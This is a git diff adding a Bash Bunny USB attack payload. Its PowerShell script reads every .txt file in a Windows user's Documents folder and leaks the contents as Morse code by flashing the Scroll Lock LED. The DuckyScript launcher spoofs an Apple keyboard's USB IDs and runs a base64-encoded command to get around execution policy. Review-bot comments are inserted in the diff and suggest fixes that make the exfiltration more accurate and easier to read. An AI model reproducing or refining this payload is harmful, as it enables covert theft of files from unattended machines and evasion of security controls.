diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1 b/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1
new file mode 100644
index 00000000..e0a1865a
--- /dev/null
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1
@@ -0,0 +1,33 @@
+$o = New-Object -com wscript.shell;
+$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" };
+$l = '{SCROLLLOCK}';
+function flashy($t){
+ $o.SendKeys($l);
+ sleep -m ([int]$t);
+ $o.SendKeys($l);
+ #[console]::beep(600,([int]$t));
+ sleep -m 300;
+}
+gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % {
+ $v = $h[[string]$_];
+ if ($v)
+ {
+ $v| % {$_[0..($_.length)]} | % {
+ flashy((([int]([string]$_))*100));
+ }
+ }
+ elseif ((!$v) -and !(([int]$_) -eq 32))
+ {
+ flashy(2700);
+ $v = ([string]([int]$_));
+ $v| % {$_[0..($_.length)]} | % {
+ $h[[string]$_] | % {$_[0..($_.length)]} | % {
+ flashy((([int]([string]$_))*100));
+ }
+ }
+ }else{
+ sleep -m 1200;
+ }
+ sleep -m 600;
+ }
+
\ No newline at end of file
diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/b.txt b/payloads/library/poc/WIN_PoSH_MorseCode/b.txt
new file mode 100644
index 00000000..4f14daf4
--- /dev/null
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/b.txt
@@ -0,0 +1 @@ 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
\ No newline at end of file
diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt b/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt
new file mode 100644
index 00000000..db924b48
--- /dev/null
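Review bot: The slice `$_[0..($_.length)]` runs one index past the end of the string (valid indices stop at `$_.length-1`), and PowerShell answers an out-of-range string index with `$null`, so every text line, every Morse string from `$h` and every ordinal string carries a trailing `$null` element into the next stage; as far as I can tell that element is still processed by `%`, so for a text line it lands in the `elseif` branch (`[int]$null` is 0, not 32) and emits a spurious 2700 ms pulse plus the code for `0` after each line, while at the two inner sites it calls `flashy(0)`. Replacing all three slices with `$_.ToCharArray()` removes the extra element and also handles an empty line cleanly, which `0..($_.length)` does not. The readme presents this file as the readable reference for checking the encoded b.txt, so a short header comment would help that check: digit `3` is a dot (300 ms) and `9` a dash (900 ms) via the `*100`, the 2700 ms pulse introduces a non-Morse character followed by the Morse of its decimal ordinal, and ordinal 32 (space) is the 1200 ms gap. For the same reason I would spell out the aliases `gci`, `gc`, `%` and `sleep` as `Get-ChildItem`, `Get-Content`, `ForEach-Object` and `Start-Sleep` so a reader does not have to resolve them.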
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt
@@ -0,0 +1,22 @@
+# Title: Morse Code File Exfiltration
+# Description: Reads all txt file and Flashes the Scrolllock on and off to represent morse code
+# Author: Cribbit
+# Version: 1.0
+# Category: PoC
+# Target: Windows (Powershell 5.1+)
+# Attackmodes: HID & STORAGE
+# Extensions: Run
+# Notes: Morse code only surports [0..9A..Z] so other char will be show as blanks
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
+
+LED ATTACK
+
+QUACK DELAY 200
+RUN WIN "powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\b.txt')))"
+
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/poc/WIN_PoSH_MorseCode/readme.md b/payloads/library/poc/WIN_PoSH_MorseCode/readme.md
new file mode 100644
index 00000000..a7000b9e
--- /dev/null
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/readme.md
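Review bot: The `# Notes:` header says characters outside `[0..9A..Z]` "will be show as blanks", which does not describe the script this payload runs: the `.ps1` in this commit (and the readme's Update section) flashes one long pulse followed by the character's decimal ordinal, and only ordinal 32 is rendered as a pause. I would change it to `# Notes: Morse code only supports [0..9A..Z]; other characters flash one long pulse then the Morse of their decimal ordinal, spaces are a pause`. `# Version: 1.0` also disagrees with the readme changelog, which lists 1.1 and 1.2 for exactly these behaviours, so the header should carry the changelog's latest version. Since the `RUN WIN` line executes whatever b.txt holds via `-encodedCommand` and the readme asks the user to verify that file by hand, a further `# Notes:` line stating that b.txt must decode to `MorseCodeFileExfiltration.ps1` would make that integrity check concrete.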
@@ -0,0 +1,33 @@
+# Morse Code File Exfiltration
+* Author: Cribbit
+* Version: 1.0
+* Target: Windows (Powershell 5.1+)
+* Category: PoC
+* Attackmode: HID & Storage
+
+## Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.0 | Initial release |
+| 1.1 | Update for non-alphanumeric |
+| 1.2 | Update for space timing |
+
+## Description
+Reads all txt file in my documents and Flashes the Scrolllock on and off to represent Morse code of the engish alphanumeric characters (0..9 A..Z)
+
+## Update
+For characters out side the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value ie (@ = 64 = -.... ....-)
+
+## Note
+This is not a very useful payload with limitation of morse code but I thought it was fun to create.
+
+The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing.
+
+Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious.
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished |